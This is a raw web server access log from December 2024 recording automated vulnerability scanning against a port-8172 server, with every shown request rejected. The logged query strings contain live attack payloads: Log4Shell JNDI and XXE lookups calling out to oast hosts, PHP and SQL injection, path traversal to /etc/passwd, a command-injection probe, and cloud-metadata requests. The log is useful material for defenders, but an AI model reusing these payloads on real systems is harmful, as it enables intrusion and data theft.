05:48:25 103.153.214.94 GET /metadata/instance api-version=2021-02-01 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 05:50:18 103.153.214.94 POST /api/external/7.0/system.System.get_infos - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 https://bcvt.kontum.gov.vn:8172 404 7 0 205 2024-12-12 05:50:51 103.153.214.94 PUT /meta - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 204 2024-12-12 05:51:05 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 220 2024-12-12 05:51:08 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 214 2024-12-12 05:51:19 103.153.214.94 POST /account - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 05:51:19 103.153.214.94 POST /account - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 217 2024-12-12 05:52:53 103.153.214.94 POST /filemanager/upload.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 05:52:53 103.153.214.94 POST /modules/attributewizardpro/file_upload.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 200 2024-12-12 05:53:13 103.153.214.94 PUT /2q3kZ40UPM5S4LullC2G4OKIuAk.json - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 05:53:34 103.153.214.94 GET /2q3kZ40UPM5S4LullC2G4OKIuAk.json - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 32 2024-12-12 05:53:51 103.153.214.94 POST /system/sharedir.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 223 2024-12-12 05:53:54 103.153.214.94 POST /en/php/usb_sync.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.23 - 404 7 0 206 2024-12-12 05:55:15 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 202 2024-12-12 05:55:53 103.153.214.94 POST /upload - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:105.0)+Gecko/20100101+Firefox/105.0 - 404 7 0 221 2024-12-12 05:56:38 103.153.214.94 GET /fuel/pages/select/ filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.153183 - 404 7 0 215 2024-12-12 05:58:33 103.153.214.94 GET /metadata/v1.json - 8172 - 206.238.196.225 - - 404 7 0 42 2024-12-12 05:58:33 103.153.214.94 GET /metadata/v1.json - 8172 - 206.238.196.225 - - 404 7 0 41 2024-12-12 05:58:49 103.153.214.94 GET /computeMetadata/v1/project/ - 8172 - 206.238.196.225 - - 404 7 0 49 2024-12-12 05:58:49 103.153.214.94 GET /computeMetadata/v1/project/ - 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 05:59:08 103.153.214.94 POST /web/google_analytics.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 260 2024-12-12 05:59:42 103.153.214.94 GET /v1/metadata/private-networks - 8172 - 206.238.196.225 - - 404 7 0 36 2024-12-12 05:59:42 103.153.214.94 GET /v1/metadata/private-networks - 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 05:59:50 103.153.214.94 GET /openstack/latest - 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 05:59:50 103.153.214.94 GET /openstack/latest - 8172 - 206.238.196.225 - - 404 7 0 35 2024-12-12 06:00:41 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.4)+AppleWebKit/616.33+(KHTML,+like+Gecko)+Version/17.6+Safari/616.33 https://bcvt.kontum.gov.vn:8172 404 7 0 213 2024-12-12 06:01:01 103.153.214.94 GET /opc/v1/instance - 8172 - 206.238.196.225 - - 404 7 0 153 2024-12-12 06:01:01 103.153.214.94 GET /opc/v1/instance - 8172 - 206.238.196.225 - - 404 7 0 171 2024-12-12 06:03:10 103.153.214.94 POST /wp-content/plugins/wp-payeezy-pay/donate.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 06:03:32 103.153.214.94 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 06:03:37 103.153.214.94 GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2q6JQWInW9BKXhTSEwozKvv6NKR.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 06:04:42 103.153.214.94 POST /XMLCHART - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 06:06:16 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 42 2024-12-12 06:06:30 103.153.214.94 GET /_debugbar/open - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 55 2024-12-12 06:06:47 103.153.214.94 POST /soap.cgi service=whatever-control;curl 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 06:06:48 103.153.214.94 POST /index.php option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 211 2024-12-12 06:07:25 103.153.214.94 POST /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 06:08:11 103.153.214.94 GET / - 8172 - 206.238.196.225 - - 404 7 0 35 2024-12-12 06:08:25 103.153.214.94 GET / - 8172 - 206.238.196.225 - - 404 7 0 32 2024-12-12 06:08:28 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 202 2024-12-12 06:08:32 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 199 2024-12-12 06:09:52 103.153.214.94 POST /user/register element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 bcvt.kontum.gov.vn:8172/user/register 404 7 0 222 2024-12-12 06:10:04 103.153.214.94 POST /php/upload.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.5112.81+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 199 2024-12-12 06:10:08 103.153.214.94 GET /Uploads/2q6JQPr8faj2uV803fUWaAlpEpS.php7 - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 06:10:32 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 06:10:35 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 195 2024-12-12 06:11:47 103.153.214.94 GET /assets/file:/etc/passwd - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 400 0 0 226 2024-12-12 06:12:45 103.153.214.94 POST /webtools/control/xmlrpc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.27 - 404 7 0 207 2024-12-12 06:13:35 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 227 2024-12-12 06:13:36 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 230 2024-12-12 06:13:43 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/88.0.4324.182+Safari/537.36 - 404 7 0 199 2024-12-12 06:14:08 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 197 2024-12-12 06:15:39 103.153.214.94 GET / echo+aNBdSPDywe 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 - 404 7 0 199 2024-12-12 06:16:24 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 210 2024-12-12 06:17:38 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/617.29+(KHTML,+like+Gecko)+Version/17.7+Safari/617.29 - 404 7 0 218 2024-12-12 06:17:57 103.153.214.94 POST /ws_utc/resources/setting/options - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 06:18:01 103.153.214.94 POST /ws_utc/resources/setting/keystore - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13.0)+AppleWebKit/617.28+(KHTML,+like+Gecko)+Version/17.0+Safari/617.28 - 404 7 0 219 2024-12-12 06:18:57 103.153.214.94 POST /checkValid - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 217 2024-12-12 06:18:58 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 218 2024-12-12 06:22:33 103.153.214.94 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 06:22:36 103.153.214.94 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 06:22:41 103.153.214.94 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/617.2.4+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4 - 404 7 0 208 2024-12-12 06:22:43 103.153.214.94 POST /Onboarding/Import - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 54 2024-12-12 06:22:44 103.153.214.94 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 199 2024-12-12 06:22:46 103.153.214.94 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 206 2024-12-12 06:22:49 103.153.214.94 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 199 2024-12-12 06:24:46 103.153.214.94 GET /wan.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 236 2024-12-12 06:25:35 103.153.214.94 PUT /testing-put.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 58 2024-12-12 06:25:49 103.153.214.94 GET /testing-put.txt - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 55 2024-12-12 06:26:10 103.153.214.94 POST /password_change.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 https://bcvt.kontum.gov.vn:8172 404 7 0 205 2024-12-12 06:27:27 103.153.214.94 POST /seeyon/thirdpartyController.do - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 60 2024-12-12 06:27:31 103.153.214.94 POST /rpc.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 196 2024-12-12 06:27:31 103.153.214.94 POST /session_login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 https://bcvt.kontum.gov.vn:8172 404 7 0 199 2024-12-12 06:27:31 103.153.214.94 POST /rpc.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.46 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 206 2024-12-12 06:27:31 103.153.214.94 POST /session_login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 https://bcvt.kontum.gov.vn:8172 404 7 0 223 2024-12-12 06:28:14 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 06:28:15 103.153.214.94 POST /crowd/admin/uploadplugin.action - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 200 2024-12-12 06:28:17 103.153.214.94 GET /guestLogin.html guest=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Safari/605.1.15 - 404 7 0 59 2024-12-12 06:28:18 103.153.214.94 POST /Collector/diagnostics/ping - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 215 2024-12-12 06:28:19 103.153.214.94 GET /crowd/plugins/servlet/exp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 224 2024-12-12 06:29:50 103.153.214.94 GET /registerUser.html init=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.9.26 - 404 7 0 34 2024-12-12 06:30:14 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.61 - 404 7 0 199 2024-12-12 06:30:29 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 06:30:32 103.153.214.94 POST /Collector/diagnostics/trace_route - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 196 2024-12-12 06:31:07 103.153.214.94 GET /wp-content/plugins/visualizer/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.4)+AppleWebKit/616.33+(KHTML,+like+Gecko)+Version/17.6+Safari/616.33 - 404 7 0 202 2024-12-12 06:31:42 103.153.214.94 POST /getcfg.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 209 2024-12-12 06:31:42 103.153.214.94 POST /ui/api/v1/ui/auth/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.27 - 404 7 0 204 2024-12-12 06:31:47 103.153.214.94 POST /admin/ n=language&c=language_general&a=doExportPack 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.25 - 404 7 0 201 2024-12-12 06:32:35 103.153.214.94 GET /jnoj/web/polygon/problem/viewfile id=1&name=../../../../../../../etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 226 2024-12-12 06:35:05 103.153.214.94 POST /admin/auth/reset-password - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 06:36:05 103.153.214.94 POST /plus/weixin.php signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp&nonce 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 34 2024-12-12 06:37:59 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 234 2024-12-12 06:38:02 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 197 2024-12-12 06:38:05 103.153.214.94 GET /talari/app/files/2q6JQObzGLry2ga6ns023PTyptU - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 203 2024-12-12 06:38:27 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 219 2024-12-12 06:39:23 103.153.214.94 POST /boafrm/formSysCmd - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 206 2024-12-12 06:42:18 103.153.214.94 POST /jars/upload - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.153183 - 404 7 0 41 2024-12-12 06:42:33 103.153.214.94 POST /servlet/UploadServlet - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 197 2024-12-12 06:42:37 103.153.214.94 GET /test.txt - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 214 2024-12-12 06:42:49 103.153.214.94 GET / pum_action=tools_page_tab_system_info 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 06:42:52 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 200 2024-12-12 06:43:33 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 06:43:41 103.153.214.94 GET /solr/admin/cores action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-536%7D%24%7B%3A-418%7D.%24%7BhostName%7D.uri.ctcj3jjbclslbev4n7q067zfcm48u6kix.oast.live%2F%7D 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.198+Safari/537.36 - 404 7 0 42 2024-12-12 06:43:43 103.153.214.94 GET /solr/admin/collections action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-536%7D%24%7B%3A-418%7D.%24%7BhostName%7D.uri.ctcj3jjbclslbev4n7q0crfm9kqzrekh7.oast.live%2F%7D 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 67 2024-12-12 06:44:17 103.153.214.94 GET /webtools/control/main - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 55 2024-12-12 06:45:04 103.153.214.94 POST /apply_sec.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 208 2024-12-12 06:45:05 103.153.214.94 POST /dashboard/uploadID.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 06:45:08 103.153.214.94 POST /apply_sec.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 207 2024-12-12 06:45:11 103.153.214.94 POST /apply_sec.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 201 2024-12-12 06:45:35 103.153.214.94 GET /Reports/Pages/Folder.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 34 2024-12-12 06:45:47 103.153.214.94 GET /ReportServer/Pages/Folder.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 44 2024-12-12 06:45:49 103.153.214.94 GET /xmlpserver/convert xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//ctd67t3bclspkptm3qo09ctjeau35fx3a.oast.fun/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Mobile/15E148+Safari/604.1 - 404 7 0 200 2024-12-12 06:46:17 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 https://bcvt.kontum.gov.vn:8172 404 7 0 69 2024-12-12 06:46:22 103.153.214.94 POST /rest/tinymce/1/macro/preview - 8172 - 